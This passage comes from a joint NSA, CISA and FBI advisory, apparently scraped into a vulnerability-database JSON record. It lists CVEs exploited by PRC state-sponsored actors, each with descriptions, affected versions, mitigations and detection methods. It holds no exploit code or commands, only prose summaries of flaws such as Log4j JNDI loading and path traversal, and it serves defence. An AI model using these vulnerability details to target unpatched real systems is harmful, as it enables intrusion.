\n\nCVE-2021-26855\n\n| \n\nRemote Code Execution \n \nF5 Big-IP\n\n| \n\nCVE-2020-5902\n\n| \n\nRemote Code Execution \n \nVMware vCenter Server\n\n| \n\nCVE-2021-22005\n\n| \n\nArbitrary File Upload \n \nCitrix ADC\n\n| \n\nCVE-2019-19781\n\n| \n\nPath Traversal \n \nCisco Hyperflex\n\n| \n\nCVE-2021-1497\n\n| \n\nCommand Line Execution \n \nBuffalo WSR\n\n| \n\nCVE-2021-20090\n\n| \n\nRelative Path Traversal \n \nAtlassian Confluence Server and Data Center\n\n| \n\nCVE-2021-26084\n\n| \n\nRemote Code Execution \n \nHikvision Webserver\n\n| \n\nCVE-2021-36260\n\n| \n\nCommand Injection \n \nSitecore XP\n\n| \n\nCVE-2021-42237\n\n| \n\nRemote Code Execution \n \nF5 Big-IP\n\n| \n\nCVE-2022-1388\n\n| \n\nRemote Code Execution \n \nApache\n\n| \n\nCVE-2022-24112\n\n| \n\nAuthentication Bypass by Spoofing \n \nZOHO\n\n| \n\nCVE-2021-40539\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-26857\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-26858\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-27065\n\n| \n\nRemote Code Execution \n \nApache HTTP Server\n\n| \n\nCVE-2021-41773\n\n| \n\nPath Traversal \n \nThese state-sponsored actors continue to use virtual private networks (VPNs) to obfuscate their activities and target web-facing applications to establish initial access. Many of the CVEs indicated in Table 1 allow the actors to surreptitiously gain unauthorized access into sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks. For additional information on PRC state-sponsored cyber actors targeting network devices, please see [People\u2019s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3055748/nsa-cisa-and-fbi-expose-prc-state-sponsored-exploitation-of-network-providers-d/>).\n\n### Mitigations\n\nNSA, CISA, and FBI urge organizations to apply the recommendations below and those listed in Appendix A.\n\n * Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n * Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices.\n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\n\n## Appendix A\n\n_Table II: Apache CVE-2021-44228_\n\nApache CVE-2021-44228 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nApache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against malicious actor controlled LDAP and other JNDI related endpoints. A malicious actor who can control log messages or log message parameters could execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * See vendor\u2019s [Guidance For Preventing, Detecting, and Hunting for Exploitation of the Log4j 2 Vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>). \n \n_Vulnerable Technologies and Versions_\n\nThere are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, check <https://nvd.nist.gov/vuln/detail/CVE-2021-44228>. \n \n_Table III: Pulse CVE-2019-11510_\n\nPulse CVE-2019-11510 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote malicious actor could send a specially crafted URI to perform an arbitrary file reading vulnerability. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * Use CISA\u2019s \u201cCheck Your Pulse\u201d Tool. \n \n_Vulnerable Technologies and Versions_\n\nPulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n \n_Table IV: GitLab CVE-2021-22205_\n\nGitLab CVE-2021-22205 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nAn issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files passed to a file parser, which resulted in a remote command execution. \n \n_Recommended Mitigations_\n\n * Update to 12.10.3, 13.9.6, and 13.8.8 for GitLab.\n * Hotpatch is available via GitLab. \n \n_Detection Methods_\n\n * Investigate logfiles.\n * Check GitLab Workhorse. \n \n_Vulnerable Technologies and Versions_\n\nGitlab CE/EE. \n \n_Table V: Atlassian CVE-2022-26134_\n\nAtlassian CVE-2022-26134 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that could allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, 7.13.0 before 7.13.7, 7.14.0 before 7.14.3, 7.15.0 before 7.15.2, 7.16.0 before 7.16.4, 7.17.0 before 7.17.4, and 7.18.0 before 7.18.1. \n \n_Recommended Mitigations_\n\n * Immediately block all Internet traffic to and from affected products AND apply the update per vendor instructions. \n * Ensure Internet-facing servers are up-to-date and have secure compliance practices. \n * Short term workaround is provided [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAll supported versions of Confluence Server and Data Center\n\nConfluence Server and Data Center versions after 1.3.0 \n \n_Table VI: Microsoft CVE-2021-26855_\n\nMicrosoft CVE-2021-26855 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft has released security updates for Windows Exchange Server. To exploit these vulnerabilities, an authenticated malicious actor could send malicious requests to an affected server. A malicious actor who successfully exploited these vulnerabilities would execute arbitrary code and compromise the affected systems. If successfully exploited, these vulnerabilities could allow an adversary to obtain access to sensitive information, bypass security restrictions, cause a denial of service conditions, and/or perform unauthorized actions on the affected Exchange server, which could aid in further malicious activity. \n \n_Recommended Mitigations_\n\n * Apply the appropriate Microsoft Security Update.\n * Microsoft Exchange Server 2013 Cumulative Update 23 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 18 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 19 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 7 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 8 (KB5000871)\n * Restrict untrusted connections. \n \n_Detection Methods_\n\n * Analyze Exchange product logs for evidence of exploitation.\n * Scan for known webshells. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange 2013, 2016, and 2019. \n \n_Table VII: F5 CVE-2020-5902_\n\nF5 CVE-2020-5902 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. \n \n_Recommended Mitigations_\n\n * Apply FY BIG-IP Update.\n * Restrict access to the configuration utility. \n \n_Detection Methods_\n\n * Use F5\u2019s [CVE-2020-5902 IoC Detection Tool](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>).\n * Additional detection methods can be found at <https://support.f5.com/csp/article/K52145254>. \n \n_Vulnerable Technologies and Versions_\n\nF5 Big-IP Access Policy Manager\n\nF5 Big-IP Advanced Firewall Manager\n\nF5 Big-IP Advanced Web Application Firewall\n\nF5 Big-IP Analytics\n\nF5 Big-IP Application Acceleration Manager\n\nF5 Big-IP Application Security Manager\n\nF5 Big-IP Ddos Hybrid Defender\n\nF5 Big-IP Domain Name System (DNS)\n\nF5 Big-IP Fraud Protection Service (FPS)\n\nF5 Big-IP Global Traffic Manager (GTM)\n\nF5 Big-IP Link Controller\n\nF5 Networks Big-IP Local Traffic Manager (LTM)\n\nF5 Big-IP Policy Enforcement Manager (PEM)\n\nF5 SSL Orchestrator \n \n_References_\n\n<https://support.f5.com/csp/article/K00091341>\n\n<https://support.f5.com/csp/article/K07051153>\n\n<https://support.f5.com/csp/article/K20346072>\n\n<https://support.f5.com/csp/article/K31301245>\n\n<https://support.f5.com/csp/article/K33023560>\n\n<https://support.f5.com/csp/article/K43638305>\n\n<https://support.f5.com/csp/article/K52145254>\n\n<https://support.f5.com/csp/article/K82518062> \n \n_Table VIII: VMware CVE-2021-22005_\n\nVMware CVE-2021-22005 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThe vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. \n \n_Recommended Mitigations_\n\n * Apply Vendor Updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVMware Cloud Foundation\n\nVMware VCenter Server \n \n_Table IX: Citrix CVE-2019-19781_\n\nCitrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n \n_Recommended Mitigations_\n\n * Apply vendor [mitigations](<https://support.citrix.com/article/CTX267679/mitigation-steps-for-cve201919781>).\n * Use the CTX269180 - [CVE-2019-19781 Verification Tool](<https://support.citrix.com/article/CTX269180/cve201919781-verification-tool>) provided by Citrix. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nCitrix ADC, Gateway, and SD-WAN WANOP \n \n_Table X: Cisco CVE-2021-1497_\n\nCisco CVE-2021-1497 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nMultiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote malicious actor to perform a command injection against an affected device. For more information about these vulnerabilities, see the Technical details section of this advisory. \n \n_Recommended Mitigations_\n\n * Apply Cisco software updates. \n \n_Detection Methods_\n\n * Look at the Snort [Rules](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR#details>) provided by Cisco. \n \n_Vulnerable Technologies and Versions_\n\nCisco Hyperflex Hx Data Platform 4.0(2A) \n \n_Table XI: Buffalo CVE-2021-20090_\n\nBuffalo CVE-2021-20090 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote malicious actors to bypass authentication. \n \n_Recommended Mitigations_\n\n * Update firmware to latest available version. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nBuffalo Wsr-2533Dhpl2-Bk Firmware\n\nBuffalo Wsr-2533Dhp3-Bk Firmware \n \n_Table XII: Atlassian CVE-2021-26084_\n\nAtlassian CVE-2021-26084 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23 and from version 6.14.0 before 7.4.11, version 7.5.0 before 7.11.6, and version 7.12.0 before 7.12.5. \n \n_Recommended Mitigations_\n\n * Update confluence version to 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0.\n * Avoid using end-of-life devices.\n * Use Intrusion Detection Systems (IDS). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAtlassian Confluence\n\nAtlassian Confluence Server\n\nAtlassian Data Center\n\nAtlassian Jira Data Center \n \n_Table XIII: Hikvision CVE-2021-36260_\n\nHikvision CVE-2021-36260 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A command injection vulnerability exists in the web server of some Hikvision products. Due to the insufficient input validation, a malicious actor can exploit the vulnerability to launch a command injection by sending some messages with malicious commands. \n \n_Recommended Mitigations_\n\n * Apply the latest firmware updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVarious Hikvision Firmware to include Ds, Ids, and Ptz \n \n_References_\n\n<https://www.cisa.gov/uscert/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260> \n \n_Table XIV: Sitecore CVE-2021-42237_\n\nSitecore CVE-2021-42237 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nSitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability. \n \n_Recommended Mitigations_\n\n * Update to latest version.\n * Delete the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nSitecore Experience Platform 7.5, 7.5 Update 1, and 7.5 Update 2\n\nSitecore Experience Platform 8.0, 8.0 Service Pack 1, and 8.0 Update 1-Update 7\n\nSitecore Experience Platform 8.0 Service Pack 1\n\nSitecore Experience Platform 8.1, and Update 1-Update 3\n\nSitecore Experience Platform 8.2, and Update 1-Update 7 \n \n_Table XV: F5 CVE-2022-1388_\n\nF5 CVE-2022-1388 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. \n \n_Recommended Mitigations_\n\n * Block iControl REST access through the self IP address.\n * Block iControl REST access through the management interface.\n * Modify the BIG-IP httpd configuration. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nBig IP versions:\n\n16.1.0-16.1.2\n\n15.1.0-15.1.5\n\n14.1.0-14.1.4\n\n13.1.0-13.1.4\n\n12.1.0-12.1.6\n\n11.6.1-11.6.5 \n \n_Table XVI: Apache CVE-2022-24112_\n\nApache CVE-2022-24112 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA malicious actor can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. \n \n_Recommended Mitigations_\n\n * In affected versions of Apache APISIX, you can avoid this risk by explicitly commenting out batch-requests in the conf/config.yaml and conf/config-default.yaml files and restarting Apache APISIX.\n * Update to 2.10.4 or 2.12.1. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nApache APISIX between 1.3 and 2.12.1 (excluding 2.12.1)\n\nLTS versions of Apache APISIX between 2.10.0 and 2.10.4 \n \n_Table XVII: ZOHO CVE-2021-40539_\n\nZOHO CVE-2021-40539 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nZoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. \n \n_Recommended Mitigations_\n\n * Upgrade to latest version. \n \n_Detection Methods_\n\n * Run ManageEngine\u2019s detection tool.\n * Check for specific files and [logs](<https://www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html>). \n \n_Vulnerable Technologies and Versions_\n\nZoho Corp ManageEngine ADSelfService Plus \n \n_Table XVIII: Microsoft CVE-2021-26857_\n\nMicrosoft CVE-2021-26857 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: https://github.com/microsoft/CSS-Exchange/tree/main/Security.\n * Hashes can be found here: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XIX: Microsoft CVE-2021-26858_\n\nMicrosoft CVE-2021-26858 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XX: Microsoft CVE-2021-27065_\n\nMicrosoft CVE-2021-27065 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_References_\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065> \n \n_Table XXI: Apache CVE-2021-41773_\n\nApache CVE-2021-41773 CVSS 3.0: 7.5 (High) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. A malicious actor could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied,\" these requests can succeed. Enabling CGI scripts for these aliased paths could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 is incomplete (see CVE-2021-42013). \n \n_Recommended Mitigations_\n\n * Apply update or patch. \n \n_Detection Methods_\n\n * Commercially available scanners can detect CVE. \n \n_Vulnerable Technologies and Versions_\n\nApache HTTP Server 2.4.49 and 2.4.50\n\nFedoraproject Fedora 34 and 35\n\nOracle Instantis Enterprise Track 17.1-17.3\n\nNetapp Cloud Backup \n \n### Revisions\n\nInitial Publication: October 6, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-06T12:00:00", "type": "ics", "title": "Top CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134", "CVE-2023-27350"], "modified": "2022-10-06T12:00:00", "id": "AA22-279A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-279a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Buffalo Router Path Traversal (CVE-2021-20090)

Description

Related